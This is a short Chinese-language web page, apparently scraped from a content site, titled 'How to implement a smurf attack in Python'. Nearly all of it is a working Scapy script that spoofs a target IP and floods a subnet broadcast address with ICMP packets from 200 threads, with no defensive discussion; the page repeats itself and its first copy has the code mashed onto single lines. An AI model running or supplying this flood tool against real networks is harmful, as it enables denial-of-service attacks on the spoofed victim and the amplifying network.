如何用Python编程语言实施smurf攻击?
- 内容介绍
- 文章标签
- 相关推荐
本文共计143个文字,预计阅读时间需要1分钟。
pythonfrom scapy.all import *from time import sleepimport _threadimport random
target='192.168.113.100'threadnum=200
def smurf(target): while True: send(IP(src=target, dst='192.168.113.255') / ICMP(), count=100)
启动200个线程执行smurf攻击for _ in range(threadnum): _thread.start_new_thread(smurf, (target,))
from time import sleep
import _thread
import random
target = '192.168.113.100'
threadnum = 200
def smurf(target):
while True:
send(IP(src=target, dst="192.168.113.255")/ICMP(), count=100, verbose=0)
def attack(target):
print ("Start Attack...")
for i in range(threadnum):
_thread.start_new_thread(smurf, (target, ))
while True:
sleep(1)
attack(target)
本文共计143个文字,预计阅读时间需要1分钟。
pythonfrom scapy.all import *from time import sleepimport _threadimport random
target='192.168.113.100'threadnum=200
def smurf(target): while True: send(IP(src=target, dst='192.168.113.255') / ICMP(), count=100)
启动200个线程执行smurf攻击for _ in range(threadnum): _thread.start_new_thread(smurf, (target,))
from time import sleep
import _thread
import random
target = '192.168.113.100'
threadnum = 200
def smurf(target):
while True:
send(IP(src=target, dst="192.168.113.255")/ICMP(), count=100, verbose=0)
def attack(target):
print ("Start Attack...")
for i in range(threadnum):
_thread.start_new_thread(smurf, (target, ))
while True:
sleep(1)
attack(target)

